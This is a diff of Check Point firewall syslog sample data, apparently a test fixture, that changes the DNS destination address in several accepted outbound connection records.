 <134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53122"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57444"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50761"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57444"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50761"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.146"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43124"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44583"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44583"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"172.217.168.194"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38596"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38534"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.146"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43130"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53609"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46679"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50264"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49124"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53609"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46679"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50264"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49124"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53132"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38423"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38423"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54402"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.11.238.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52104"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37726"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40113"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
